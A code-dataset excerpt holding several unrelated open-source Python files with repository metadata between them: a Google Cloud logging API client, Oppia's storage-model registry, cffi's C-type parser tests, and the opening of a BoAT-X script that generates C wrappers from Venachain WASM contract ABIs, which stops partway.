:param filter_: the advanced logs filter expression defining the
entries exported by the metric.
:type description: str
:param description: description of the metric.
:rtype: dict
:returns: The returned (updated) resource.
"""
target = '/projects/%s/metrics/%s' % (project, metric_name)
data = {
'name': metric_name,
'filter': filter_,
'description': description,
}
return self.api_request(method='PUT', path=target, data=data)
def metric_delete(self, project, metric_name):
"""API call: delete a metric resource.
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/projects.metrics/delete
:type project: str
:param project: ID of the project containing the metric.
:type metric_name: str
:param metric_name: the name of the metric.
"""
target = '/projects/%s/metrics/%s' % (project, metric_name)
self.api_request(method='DELETE', path=target)
def _item_to_entry(iterator, resource, loggers):
"""Convert a log entry resource to the native object.
.. note::
This method does not have the correct signature to be used as
the ``item_to_value`` argument to
:class:`~google.cloud.iterator.Iterator`. It is intended to be
patched with a mutable ``loggers`` argument that can be updated
on subsequent calls. For an example, see how the method is
used above in :meth:`_LoggingAPI.list_entries`.
:type iterator: :class:`~google.cloud.iterator.Iterator`
:param iterator: The iterator that is currently in use.
:type resource: dict
:param resource: Log entry JSON resource returned from the API.
:type loggers: dict
:param loggers:
A mapping of logger fullnames -> loggers. If the logger
that owns the entry is not in ``loggers``, the entry
will have a newly-created logger.
:rtype: :class:`~google.cloud.logging.entries._BaseEntry`
:returns: The next log entry in the page.
"""
return entry_from_resource(resource, iterator.client, loggers)
def _item_to_sink(iterator, resource):
"""Convert a sink resource to the native object.
:type iterator: :class:`~google.cloud.iterator.Iterator`
:param iterator: The iterator that is currently in use.
:type resource: dict
:param resource: Sink JSON resource returned from the API.
:rtype: :class:`~google.cloud.logging.sink.Sink`
:returns: The next sink in the page.
"""
return Sink.from_api_repr(resource, iterator.client)
def _item_to_metric(iterator, resource):
"""Convert a metric resource to the native object.
:type iterator: :class:`~google.cloud.iterator.Iterator`
:param iterator: The iterator that is currently in use.
:type resource: dict
:param resource: Metric JSON resource returned from the API.
:rtype: :class:`~google.cloud.logging.metric.Metric`
:returns: The next metric in the page.
"""
return Metric.from_api_repr(resource, iterator.client)
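# A minimal usage sketch (assumption: ``client`` is an already-configured
# google.cloud.logging.client.Client; the real wiring lives in that module):
#
#     logging_api = _LoggingAPI(client)
#     for entry in logging_api.list_entries(projects=['my-project'],
#                                           filter_='severity>=ERROR'):
#         ...  # each item is built by _item_to_entry from the JSON resource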
| 34.623782
| 90
| 0.631517
|
7b2d5fb3b1438ad07ed7138f6df36b16b805f2a3
| 12,087
|
py
|
Python
|
core/platform/models.py
|
steve7158/oppia
|
e2cae72fa5d3503c64d195f09d3460507697730c
|
[
"Apache-2.0"
] | 1
|
2019-05-30T18:08:37.000Z
|
2019-05-30T18:08:37.000Z
|
core/platform/models.py
|
steve7158/oppia
|
e2cae72fa5d3503c64d195f09d3460507697730c
|
[
"Apache-2.0"
] | 7
|
2019-08-20T08:30:43.000Z
|
2022-02-12T18:47:57.000Z
|
core/platform/models.py
|
steve7158/oppia
|
e2cae72fa5d3503c64d195f09d3460507697730c
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Interface for storage model switching."""
import feconf
import utils
# Valid model names.
NAMES = utils.create_enum(
'activity', 'audit', 'base_model', 'classifier', 'collection', 'config',
'email', 'exploration', 'feedback', 'file', 'job', 'question',
'recommendations', 'skill', 'statistics', 'story', 'suggestion', 'topic',
'user')
GAE_PLATFORM = 'gae'
class Platform(object):
"""A base class for platform-specific imports related to GAE."""
@classmethod
def import_models(cls):
"""An abstract method that should be implemented on inherited
classes.
Raises:
NotImplementedError: The method is not overwritten in derived
classes.
"""
raise NotImplementedError
class _Gae(Platform):
"""Provides platform-specific imports related to
GAE (Google App Engine).
"""
@classmethod
def import_models(cls, model_names):
"""Imports and returns the storage modules listed in model_names.
Args:
model_names: list(str). List of storage module names.
Returns:
tuple(module): Tuple of storage modules.
Raises:
Exception: Invalid model name.
"""
returned_models = []
for name in model_names:
if name == NAMES.activity:
from core.storage.activity import gae_models as activity_models
returned_models.append(activity_models)
elif name == NAMES.audit:
from core.storage.audit import gae_models as audit_models
returned_models.append(audit_models)
elif name == NAMES.base_model:
from core.storage.base_model import gae_models as base_models
returned_models.append(base_models)
elif name == NAMES.classifier:
from core.storage.classifier import gae_models as classifier_data_models # pylint: disable=line-too-long
returned_models.append(classifier_data_models)
elif name == NAMES.collection:
from core.storage.collection import gae_models as collection_models # pylint: disable=line-too-long
returned_models.append(collection_models)
elif name == NAMES.config:
from core.storage.config import gae_models as config_models
returned_models.append(config_models)
elif name == NAMES.email:
from core.storage.email import gae_models as email_models
returned_models.append(email_models)
elif name == NAMES.exploration:
from core.storage.exploration import gae_models as exp_models
returned_models.append(exp_models)
elif name == NAMES.feedback:
from core.storage.feedback import gae_models as feedback_models
returned_models.append(feedback_models)
elif name == NAMES.file:
from core.storage.file import gae_models as file_models
returned_models.append(file_models)
elif name == NAMES.job:
from core.storage.job import gae_models as job_models
returned_models.append(job_models)
elif name == NAMES.question:
from core.storage.question import gae_models as question_models
returned_models.append(question_models)
elif name == NAMES.recommendations:
from core.storage.recommendations import gae_models as recommendations_models # pylint: disable=line-too-long
returned_models.append(recommendations_models)
elif name == NAMES.skill:
from core.storage.skill import gae_models as skill_models
returned_models.append(skill_models)
elif name == NAMES.statistics:
from core.storage.statistics import gae_models as statistics_models # pylint: disable=line-too-long
returned_models.append(statistics_models)
elif name == NAMES.story:
from core.storage.story import gae_models as story_models
returned_models.append(story_models)
elif name == NAMES.suggestion:
from core.storage.suggestion import gae_models as suggestion_models # pylint: disable=line-too-long
returned_models.append(suggestion_models)
elif name == NAMES.topic:
from core.storage.topic import gae_models as topic_models
returned_models.append(topic_models)
elif name == NAMES.user:
from core.storage.user import gae_models as user_models
returned_models.append(user_models)
else:
raise Exception('Invalid model name: %s' % name)
return tuple(returned_models)
@classmethod
def import_transaction_services(cls):
"""Imports and returns gae_transaction_services module.
Returns:
module. The gae_transaction_services module.
"""
from core.platform.transactions import gae_transaction_services
return gae_transaction_services
@classmethod
def import_current_user_services(cls):
"""Imports and returns gae_current_user_services module.
Returns:
module. The gae_current_user_services module.
"""
from core.platform.users import gae_current_user_services
return gae_current_user_services
@classmethod
def import_datastore_services(cls):
"""Imports and returns gae_datastore_services module.
Returns:
module. The gae_datastore_services module.
"""
from core.platform.datastore import gae_datastore_services
return gae_datastore_services
@classmethod
def import_app_identity_services(cls):
"""Imports and returns gae_app_identity_services module.
Returns:
module. The gae_app_identity_services module.
"""
from core.platform.app_identity import gae_app_identity_services
return gae_app_identity_services
@classmethod
def import_gae_image_services(cls):
"""Imports and returns gae_image_services module.
Returns:
module. The gae_image_services module.
"""
from core.platform.image import gae_image_services
return gae_image_services
@classmethod
def import_email_services(cls):
"""Imports and returns the email services module specified in feconf.py.
Returns:
module. The email_services module to use, based on the feconf.py
setting.
Raises:
Exception: feconf.EMAIL_SERVICE_PROVIDER does not correspond
to a valid email_services module.
"""
if feconf.EMAIL_SERVICE_PROVIDER == feconf.EMAIL_SERVICE_PROVIDER_GAE:
from core.platform.email import gae_email_services
return gae_email_services
elif (feconf.EMAIL_SERVICE_PROVIDER ==
feconf.EMAIL_SERVICE_PROVIDER_MAILGUN):
from core.platform.email import mailgun_email_services
return mailgun_email_services
else:
raise Exception(
('Invalid email service provider: %s'
% feconf.EMAIL_SERVICE_PROVIDER))
@classmethod
def import_memcache_services(cls):
"""Imports and returns gae_memcache_services.
Returns:
module. The gae_memcache_services module.
"""
from core.platform.memcache import gae_memcache_services
return gae_memcache_services
@classmethod
def import_taskqueue_services(cls):
"""Imports and returns gae_taskqueue_services module.
Returns:
module. The gae_taskqueue_services module.
"""
from core.platform.taskqueue import gae_taskqueue_services
return gae_taskqueue_services
@classmethod
def import_search_services(cls):
"""Imports and returns gae_search_services module.
Returns:
module. The gae_search_services module.
"""
from core.platform.search import gae_search_services
return gae_search_services
NAME = 'gae'
class Registry(object):
"""Platform-agnostic interface for retrieving platform-specific
modules.
"""
# Maps platform names to the corresponding module registry classes.
_PLATFORM_MAPPING = {
_Gae.NAME: _Gae,
}
@classmethod
def _get(cls):
"""Returns the appropriate interface class for platform-specific
imports.
Returns:
class: The corresponding platform-specific interface class.
"""
return cls._PLATFORM_MAPPING.get(GAE_PLATFORM)
@classmethod
def import_models(cls, model_names):
"""Imports and returns the storage modules listed in model_names.
Args:
model_names: list(str). List of storage module names.
Returns:
list(module). The corresponding storage-layer modules.
"""
return cls._get().import_models(model_names)
@classmethod
def import_current_user_services(cls):
"""Imports and returns current_user_services module.
Returns:
module. The current_user_services module.
"""
return cls._get().import_current_user_services()
@classmethod
def import_datastore_services(cls):
"""Imports and returns datastore_services module.
Returns:
module. The datastore_services module.
"""
return cls._get().import_datastore_services()
@classmethod
def import_transaction_services(cls):
"""Imports and returns transaction_services module.
Returns:
module. The transaction_services module.
"""
return cls._get().import_transaction_services()
@classmethod
def import_app_identity_services(cls):
"""Imports and returns app_identity_services module.
Returns:
module. The app_identity_services module.
"""
return cls._get().import_app_identity_services()
@classmethod
def import_gae_image_services(cls):
"""Imports and returns gae_image_services module.
Returns:
module. The gae_image_services module.
"""
return cls._get().import_gae_image_services()
@classmethod
def import_email_services(cls):
"""Imports and returns email_services module.
Returns:
module. The email_services module.
"""
return cls._get().import_email_services()
@classmethod
def import_memcache_services(cls):
"""Imports and returns memcache_services module.
Returns:
module. The memcache_services module.
"""
return cls._get().import_memcache_services()
@classmethod
def import_taskqueue_services(cls):
"""Imports and returns taskqueue_services module.
Returns:
module. The taskqueue_services module.
"""
return cls._get().import_taskqueue_services()
@classmethod
def import_search_services(cls):
"""Imports and returns search_services module.
Returns:
module. The search_services module.
"""
return cls._get().import_search_services()
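# A minimal usage sketch (illustrative; the actual call sites live in Oppia's
# service layers):
#
#     from core.platform import models
#     (exp_models, user_models) = models.Registry.import_models(
#         [models.NAMES.exploration, models.NAMES.user])
#     transaction_services = models.Registry.import_transaction_services()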
| 34.732759
| 125
| 0.651526
|
02b15b14a927d4c9e6ce24934e01000c7d8632a6
| 15,467
|
py
|
Python
|
extra_tests/cffi_tests/cffi1/test_parse_c_type.py
|
nanjekyejoannah/pypy
|
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
|
[
"Apache-2.0",
"OpenSSL"
] | 333
|
2015-08-08T18:03:38.000Z
|
2022-03-22T18:13:12.000Z
|
extra_tests/cffi_tests/cffi1/test_parse_c_type.py
|
nanjekyejoannah/pypy
|
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
|
[
"Apache-2.0",
"OpenSSL"
] | 7
|
2020-02-16T16:49:05.000Z
|
2021-11-26T09:00:56.000Z
|
extra_tests/cffi_tests/cffi1/test_parse_c_type.py
|
nanjekyejoannah/pypy
|
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
|
[
"Apache-2.0",
"OpenSSL"
] | 55
|
2015-08-16T02:41:30.000Z
|
2022-03-20T20:33:35.000Z
|
# Generated by pypy/tool/import_cffi.py
import sys, re, os, py
import cffi
from cffi import cffi_opcode
if '__pypy__' in sys.builtin_module_names:
try:
# pytest >= 4.0
py.test.skip("not available on pypy", allow_module_level=True)
except TypeError:
# older pytest
py.test.skip("not available on pypy")
cffi_dir = os.path.dirname(cffi_opcode.__file__)
r_macro = re.compile(r"#define \w+[(][^\n]*|#include [^\n]*")
r_define = re.compile(r"(#define \w+) [^\n]*")
r_ifdefs = re.compile(r"(#ifdef |#endif)[^\n]*")
header = open(os.path.join(cffi_dir, 'parse_c_type.h')).read()
header = r_macro.sub(r"", header)
header = r_define.sub(r"\1 ...", header)
header = r_ifdefs.sub(r"", header)
ffi = cffi.FFI()
ffi.cdef(header)
lib = ffi.verify(
open(os.path.join(cffi_dir, '..', 'c', 'parse_c_type.c')).read() + """
static const char *get_common_type(const char *search, size_t search_len) {
return NULL;
}
""", include_dirs=[cffi_dir])
class ParseError(Exception):
pass
struct_names = ["bar_s", "foo", "foo_", "foo_s", "foo_s1", "foo_s12"]
assert struct_names == sorted(struct_names)
enum_names = ["ebar_s", "efoo", "efoo_", "efoo_s", "efoo_s1", "efoo_s12"]
assert enum_names == sorted(enum_names)
identifier_names = ["id", "id0", "id05", "id05b", "tail"]
assert identifier_names == sorted(identifier_names)
global_names = ["FIVE", "NEG", "ZERO"]
assert global_names == sorted(global_names)
ctx = ffi.new("struct _cffi_type_context_s *")
c_struct_names = [ffi.new("char[]", _n.encode('ascii')) for _n in struct_names]
ctx_structs = ffi.new("struct _cffi_struct_union_s[]", len(struct_names))
for _i in range(len(struct_names)):
ctx_structs[_i].name = c_struct_names[_i]
ctx_structs[3].flags = lib._CFFI_F_UNION
ctx.struct_unions = ctx_structs
ctx.num_struct_unions = len(struct_names)
c_enum_names = [ffi.new("char[]", _n.encode('ascii')) for _n in enum_names]
ctx_enums = ffi.new("struct _cffi_enum_s[]", len(enum_names))
for _i in range(len(enum_names)):
ctx_enums[_i].name = c_enum_names[_i]
ctx.enums = ctx_enums
ctx.num_enums = len(enum_names)
c_identifier_names = [ffi.new("char[]", _n.encode('ascii'))
for _n in identifier_names]
ctx_identifiers = ffi.new("struct _cffi_typename_s[]", len(identifier_names))
for _i in range(len(identifier_names)):
ctx_identifiers[_i].name = c_identifier_names[_i]
ctx_identifiers[_i].type_index = 100 + _i
ctx.typenames = ctx_identifiers
ctx.num_typenames = len(identifier_names)
@ffi.callback("int(unsigned long long *)")
def fetch_constant_five(p):
p[0] = 5
return 0
@ffi.callback("int(unsigned long long *)")
def fetch_constant_zero(p):
p[0] = 0
return 1
@ffi.callback("int(unsigned long long *)")
def fetch_constant_neg(p):
p[0] = 123321
return 1
ctx_globals = ffi.new("struct _cffi_global_s[]", len(global_names))
c_glob_names = [ffi.new("char[]", _n.encode('ascii')) for _n in global_names]
for _i, _fn in enumerate([fetch_constant_five,
fetch_constant_neg,
fetch_constant_zero]):
ctx_globals[_i].name = c_glob_names[_i]
ctx_globals[_i].address = _fn
ctx_globals[_i].type_op = ffi.cast("_cffi_opcode_t",
cffi_opcode.OP_CONSTANT_INT if _i != 1
else cffi_opcode.OP_ENUM)
ctx.globals = ctx_globals
ctx.num_globals = len(global_names)
def parse(input):
out = ffi.new("_cffi_opcode_t[]", 100)
info = ffi.new("struct _cffi_parse_info_s *")
info.ctx = ctx
info.output = out
info.output_size = len(out)
for j in range(len(out)):
out[j] = ffi.cast("void *", -424242)
res = lib.parse_c_type(info, input.encode('ascii'))
if res < 0:
raise ParseError(ffi.string(info.error_message).decode('ascii'),
info.error_location)
assert 0 <= res < len(out)
result = []
for j in range(len(out)):
if out[j] == ffi.cast("void *", -424242):
assert res < j
break
i = int(ffi.cast("intptr_t", out[j]))
if j == res:
result.append('->')
result.append(i)
return result
def parsex(input):
result = parse(input)
def str_if_int(x):
if isinstance(x, str):
return x
return '%d,%d' % (x & 255, x >> 8)
return ' '.join(map(str_if_int, result))
def parse_error(input, expected_msg, expected_location):
e = py.test.raises(ParseError, parse, input)
assert e.value.args[0] == expected_msg
assert e.value.args[1] == expected_location
def make_getter(name):
opcode = getattr(lib, '_CFFI_OP_' + name)
def getter(value):
return opcode | (value << 8)
return getter
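# Each encoded word packs the opcode in the low byte and its argument in the
# higher bits, i.e. ``opcode | (value << 8)``; parsex() above prints it back as
# "low,high" via ``x & 255`` and ``x >> 8``. For instance, if _CFFI_OP_POINTER
# happened to be 3 (a hypothetical value), Pointer(2) would encode as
# 3 | (2 << 8) == 515 and print as "3,2".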
Prim = make_getter('PRIMITIVE')
Pointer = make_getter('POINTER')
Array = make_getter('ARRAY')
OpenArray = make_getter('OPEN_ARRAY')
NoOp = make_getter('NOOP')
Func = make_getter('FUNCTION')
FuncEnd = make_getter('FUNCTION_END')
Struct = make_getter('STRUCT_UNION')
Enum = make_getter('ENUM')
Typename = make_getter('TYPENAME')
def test_simple():
for simple_type, expected in [
("int", lib._CFFI_PRIM_INT),
("signed int", lib._CFFI_PRIM_INT),
(" long ", lib._CFFI_PRIM_LONG),
("long int", lib._CFFI_PRIM_LONG),
("unsigned short", lib._CFFI_PRIM_USHORT),
("long double", lib._CFFI_PRIM_LONGDOUBLE),
(" float _Complex", lib._CFFI_PRIM_FLOATCOMPLEX),
("double _Complex ", lib._CFFI_PRIM_DOUBLECOMPLEX),
]:
assert parse(simple_type) == ['->', Prim(expected)]
def test_array():
assert parse("int[5]") == [Prim(lib._CFFI_PRIM_INT), '->', Array(0), 5]
assert parse("int[]") == [Prim(lib._CFFI_PRIM_INT), '->', OpenArray(0)]
assert parse("int[5][8]") == [Prim(lib._CFFI_PRIM_INT),
'->', Array(3),
5,
Array(0),
8]
assert parse("int[][8]") == [Prim(lib._CFFI_PRIM_INT),
'->', OpenArray(2),
Array(0),
8]
def test_pointer():
assert parse("int*") == [Prim(lib._CFFI_PRIM_INT), '->', Pointer(0)]
assert parse("int***") == [Prim(lib._CFFI_PRIM_INT),
Pointer(0), Pointer(1), '->', Pointer(2)]
def test_grouping():
assert parse("int*[]") == [Prim(lib._CFFI_PRIM_INT),
Pointer(0), '->', OpenArray(1)]
assert parse("int**[][8]") == [Prim(lib._CFFI_PRIM_INT),
Pointer(0), Pointer(1),
'->', OpenArray(4), Array(2), 8]
assert parse("int(*)[]") == [Prim(lib._CFFI_PRIM_INT),
NoOp(3), '->', Pointer(1), OpenArray(0)]
assert parse("int(*)[][8]") == [Prim(lib._CFFI_PRIM_INT),
NoOp(3), '->', Pointer(1),
OpenArray(4), Array(0), 8]
assert parse("int**(**)") == [Prim(lib._CFFI_PRIM_INT),
Pointer(0), Pointer(1),
NoOp(2), Pointer(3), '->', Pointer(4)]
assert parse("int**(**)[]") == [Prim(lib._CFFI_PRIM_INT),
Pointer(0), Pointer(1),
NoOp(6), Pointer(3), '->', Pointer(4),
OpenArray(2)]
def test_simple_function():
assert parse("int()") == [Prim(lib._CFFI_PRIM_INT),
'->', Func(0), FuncEnd(0), 0]
assert parse("int(int)") == [Prim(lib._CFFI_PRIM_INT),
'->', Func(0), NoOp(4), FuncEnd(0),
Prim(lib._CFFI_PRIM_INT)]
assert parse("int(long, char)") == [
Prim(lib._CFFI_PRIM_INT),
'->', Func(0), NoOp(5), NoOp(6), FuncEnd(0),
Prim(lib._CFFI_PRIM_LONG),
Prim(lib._CFFI_PRIM_CHAR)]
assert parse("int(int*)") == [Prim(lib._CFFI_PRIM_INT),
'->', Func(0), NoOp(5), FuncEnd(0),
Prim(lib._CFFI_PRIM_INT),
Pointer(4)]
assert parse("int*(void)") == [Prim(lib._CFFI_PRIM_INT),
Pointer(0),
'->', Func(1), FuncEnd(0), 0]
assert parse("int(int, ...)") == [Prim(lib._CFFI_PRIM_INT),
'->', Func(0), NoOp(5), FuncEnd(1), 0,
Prim(lib._CFFI_PRIM_INT)]
def test_internal_function():
assert parse("int(*)()") == [Prim(lib._CFFI_PRIM_INT),
NoOp(3), '->', Pointer(1),
Func(0), FuncEnd(0), 0]
assert parse("int(*())[]") == [Prim(lib._CFFI_PRIM_INT),
NoOp(6), Pointer(1),
'->', Func(2), FuncEnd(0), 0,
OpenArray(0)]
assert parse("int(char(*)(long, short))") == [
Prim(lib._CFFI_PRIM_INT),
'->', Func(0), NoOp(6), FuncEnd(0),
Prim(lib._CFFI_PRIM_CHAR),
NoOp(7), Pointer(5),
Func(4), NoOp(11), NoOp(12), FuncEnd(0),
Prim(lib._CFFI_PRIM_LONG),
Prim(lib._CFFI_PRIM_SHORT)]
def test_fix_arg_types():
assert parse("int(char(long, short))") == [
Prim(lib._CFFI_PRIM_INT),
'->', Func(0), Pointer(5), FuncEnd(0),
Prim(lib._CFFI_PRIM_CHAR),
Func(4), NoOp(9), NoOp(10), FuncEnd(0),
Prim(lib._CFFI_PRIM_LONG),
Prim(lib._CFFI_PRIM_SHORT)]
assert parse("int(char[])") == [
Prim(lib._CFFI_PRIM_INT),
'->', Func(0), Pointer(4), FuncEnd(0),
Prim(lib._CFFI_PRIM_CHAR),
OpenArray(4)]
def test_enum():
for i in range(len(enum_names)):
assert parse("enum %s" % (enum_names[i],)) == ['->', Enum(i)]
assert parse("enum %s*" % (enum_names[i],)) == [Enum(i),
'->', Pointer(0)]
def test_error():
parse_error("short short int", "'short' after another 'short' or 'long'", 6)
parse_error("long long long", "'long long long' is too long", 10)
parse_error("short long", "'long' after 'short'", 6)
parse_error("signed unsigned int", "multiple 'signed' or 'unsigned'", 7)
parse_error("unsigned signed int", "multiple 'signed' or 'unsigned'", 9)
parse_error("long char", "invalid combination of types", 5)
parse_error("short char", "invalid combination of types", 6)
parse_error("signed void", "invalid combination of types", 7)
parse_error("unsigned struct", "invalid combination of types", 9)
#
parse_error("", "identifier expected", 0)
parse_error("]", "identifier expected", 0)
parse_error("*", "identifier expected", 0)
parse_error("int ]**", "unexpected symbol", 4)
parse_error("char char", "unexpected symbol", 5)
parse_error("int(int]", "expected ')'", 7)
parse_error("int(*]", "expected ')'", 5)
parse_error("int(]", "identifier expected", 4)
parse_error("int[?]", "expected a positive integer constant", 4)
parse_error("int[24)", "expected ']'", 6)
parse_error("struct", "struct or union name expected", 6)
parse_error("struct 24", "struct or union name expected", 7)
parse_error("int[5](*)", "unexpected symbol", 6)
parse_error("int a(*)", "identifier expected", 6)
parse_error("int[123456789012345678901234567890]", "number too large", 4)
#
parse_error("_Complex", "identifier expected", 0)
parse_error("int _Complex", "_Complex type combination unsupported", 4)
parse_error("long double _Complex", "_Complex type combination unsupported",
12)
def test_number_too_large():
num_max = sys.maxsize
assert parse("char[%d]" % num_max) == [Prim(lib._CFFI_PRIM_CHAR),
'->', Array(0), num_max]
parse_error("char[%d]" % (num_max + 1), "number too large", 5)
def test_complexity_limit():
parse_error("int" + "[]" * 2500, "internal type complexity limit reached",
202)
def test_struct():
for i in range(len(struct_names)):
if i == 3:
tag = "union"
else:
tag = "struct"
assert parse("%s %s" % (tag, struct_names[i])) == ['->', Struct(i)]
assert parse("%s %s*" % (tag, struct_names[i])) == [Struct(i),
'->', Pointer(0)]
def test_exchanging_struct_union():
parse_error("union %s" % (struct_names[0],),
"wrong kind of tag: struct vs union", 6)
parse_error("struct %s" % (struct_names[3],),
"wrong kind of tag: struct vs union", 7)
def test_identifier():
for i in range(len(identifier_names)):
assert parse("%s" % (identifier_names[i])) == ['->', Typename(i)]
assert parse("%s*" % (identifier_names[i])) == [Typename(i),
'->', Pointer(0)]
def test_cffi_opcode_sync():
import cffi.model
for name in dir(lib):
if name.startswith('_CFFI_'):
assert getattr(cffi_opcode, name[6:]) == getattr(lib, name)
assert sorted(cffi_opcode.PRIMITIVE_TO_INDEX.keys()) == (
sorted(cffi.model.PrimitiveType.ALL_PRIMITIVE_TYPES.keys()))
def test_array_length_from_constant():
parse_error("int[UNKNOWN]", "expected a positive integer constant", 4)
assert parse("int[FIVE]") == [Prim(lib._CFFI_PRIM_INT), '->', Array(0), 5]
assert parse("int[ZERO]") == [Prim(lib._CFFI_PRIM_INT), '->', Array(0), 0]
parse_error("int[NEG]", "expected a positive integer constant", 4)
def test_various_constant_exprs():
def array(n):
return [Prim(lib._CFFI_PRIM_CHAR), '->', Array(0), n]
assert parse("char[21]") == array(21)
assert parse("char[0x10]") == array(16)
assert parse("char[0X21]") == array(33)
assert parse("char[0Xb]") == array(11)
assert parse("char[0x1C]") == array(0x1C)
assert parse("char[0xc6]") == array(0xC6)
assert parse("char[010]") == array(8)
assert parse("char[021]") == array(17)
parse_error("char[08]", "invalid number", 5)
parse_error("char[1C]", "invalid number", 5)
parse_error("char[0C]", "invalid number", 5)
# not supported (really obscure):
# "char[+5]"
# "char['A']"
def test_stdcall_cdecl():
assert parse("int __stdcall(int)") == [Prim(lib._CFFI_PRIM_INT),
'->', Func(0), NoOp(4), FuncEnd(2),
Prim(lib._CFFI_PRIM_INT)]
assert parse("int __stdcall func(int)") == parse("int __stdcall(int)")
assert parse("int (__stdcall *)()") == [Prim(lib._CFFI_PRIM_INT),
NoOp(3), '->', Pointer(1),
Func(0), FuncEnd(2), 0]
assert parse("int (__stdcall *p)()") == parse("int (__stdcall*)()")
parse_error("__stdcall int", "identifier expected", 0)
parse_error("__cdecl int", "identifier expected", 0)
parse_error("int __stdcall", "expected '('", 13)
parse_error("int __cdecl", "expected '('", 11)
| 41.355615
| 80
| 0.556669
|
490b1821a60873afc28790d035763d183d76ac2f
| 10,655
|
py
|
Python
|
tools/venachainWASM2c.py
|
xunzhu0507/BoAT-X-Framework
|
d84d1e0c244b4ff20c7f5b74f939f61a9811283d
|
[
"Apache-2.0"
] | 1
|
2022-03-03T01:43:58.000Z
|
2022-03-03T01:43:58.000Z
|
tools/venachainWASM2c.py
|
xunzhu0507/BoAT-X-Framework
|
d84d1e0c244b4ff20c7f5b74f939f61a9811283d
|
[
"Apache-2.0"
] | null | null | null |
tools/venachainWASM2c.py
|
xunzhu0507/BoAT-X-Framework
|
d84d1e0c244b4ff20c7f5b74f939f61a9811283d
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# Copyright (C) 2018-2021 aitos.io
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This python script generates Venachain's C language interface function from contract ABI (WASM).
# Not all contract ABIs can be converted to a C interface because C lacks object-oriented programming
# capability. If the tool fails to generate the interface, you may have to organize the contract call
# manually.
# The generated C API is named "<ContractName>_<ContractApiName>", with a transaction pointer argument
# followed by contract arguments.
#
# For a state-less contract call, the generated C API returns a HEX string representing what is received
# from the blockchain network. If the call is successful, the string is the return value of the contract
# function. The return value string has to be parsed manually as per the contract prototype. If the call
# fails, it returns NULL.
#
# For value transfer or state-ful contract call, i.e. a transaction, the generated C API returns a HEX
# string representing the transaction hash. If the transaction fails, it returns NULL.
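# Illustrative example (hypothetical contract, not taken from a real ABI file):
# an ABI file named "my_token.json" declaring
#     {"name": "transfer",
#      "inputs": [{"name": "to", "type": "string"},
#                 {"name": "amount", "type": "uint64"}], ...}
# would be turned into a C prototype of roughly this shape:
#     BCHAR *my_token_transfer(BoatVenachainTx *tx_ptr, BCHAR* to, BUINT64 amount);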
import sys
import json
import os.path
generated_declaration_block_str = '''/******************************************************************************
This file is generated from contract ABI. DO NOT modify it by hand.
******************************************************************************/
'''
generated_include_block_str = '''
// Generated C function interface from smart contract ABI
#include "boatconfig.h"
#include "boatiotsdk.h"
'''
# Map from type used in smart contract to type in C
type_mapping = {
'string' :'BCHAR*',
'uint8' :'BUINT8',
'uint16' :'BUINT16',
'uint32' :'BUINT32',
'uint64' :'BUINT64',
# 'uint128' :'BUINT128',
'int8' :'BSINT8',
'int16' :'BSINT16',
'int32' :'BSINT32',
'int64' :'BSINT64',
# 'int128' :'BSINT128',
'void' :'void'
}
class CFunctionGen():
def __init__(self, abi_file_name, output_path):
self.abi_object = None
self.c_file_content = ''
self.h_file_content = ''
with open(abi_file_name) as file_handle:
self.abi_object = json.load(file_handle)
self.abi_file_name = os.path.basename(abi_file_name)
self.output_path = output_path
def generate_c_funcs(self):
if self.abi_object != None:
self.c_file_content += generated_declaration_block_str
self.c_file_content += generated_include_block_str
self.h_file_content += generated_declaration_block_str
self.h_file_content += generated_include_block_str
for abi_item in self.abi_object:
if abi_item['type'] == 'function':
self.generate_func_prototype(abi_item)
self.generate_func_body(abi_item)
def generate_func_prototype(self, abi_item):
# Extract type of return value
if len(abi_item['outputs']) == 0:
retval_str = 'BCHAR *' #'void'
else:
# For stateful transaction, returns Tx Hash;
# For state-less function call, returns a string representing the return value
retval_str = 'BCHAR *'
# Extract function name (Prefix with ABI file name because multiple contracts may have same function names)
func_name_str = self.abi_file_name.replace('.json','')
func_name_str = func_name_str.replace('.','_') + '_' + abi_item['name']
# Extract function arguments
inputs = abi_item['inputs']
inputs_len = len(inputs)
input_str = '('
input_str += 'BoatVenachainTx *tx_ptr'
if inputs_len != 0:
input_str += ', '
i = 0
while i < inputs_len:
input = inputs[i]
try:
input_str += type_mapping[input['type']] + ' ' + input['name']
except:
print(abi_item['name'] + '(): WASM C++ type (' + input['type'] + ') is incompatible with C interface auto generator.')
print('You may have to manually construct the transaction.')
quit(-1)
if i != inputs_len -1:
input_str += ', '
i = i + 1
input_str += ')'
# Generate function prototype
self.c_file_content += retval_str + func_name_str + input_str + '\n'
self.h_file_content += retval_str + func_name_str + input_str + ';\n'
def generate_func_body(self, abi_item):
func_body_str = '{\n'
# Generate local variables
if abi_item['constant'] == 'true':
func_body_str += ' BCHAR *call_result_str = NULL;\n'
else:
func_body_str += ' static BCHAR tx_hash_str[67] = \"\";\n'
func_body_str += ' BoatFieldVariable data_field;\n'
func_body_str += ' RlpEncodedStreamObject *rlp_stream_ptr;\n'
func_body_str += ' RlpObject rlp_object_list;\n'
# func_body_str += ' RlpObject rlp_object_txtype;\n'
# func_body_str += ' BUINT64 txtype;\n'
func_body_str += ' RlpObject rlp_object_string_func_name;\n'
# Local variables extracted from function arguments
inputs = abi_item['inputs']
for input in inputs:
func_body_str += ' RlpObject rlp_object_string_' + input['name'] + ';\n'
func_body_str += ' boat_try_declare;\n\n'
# Set Nonce
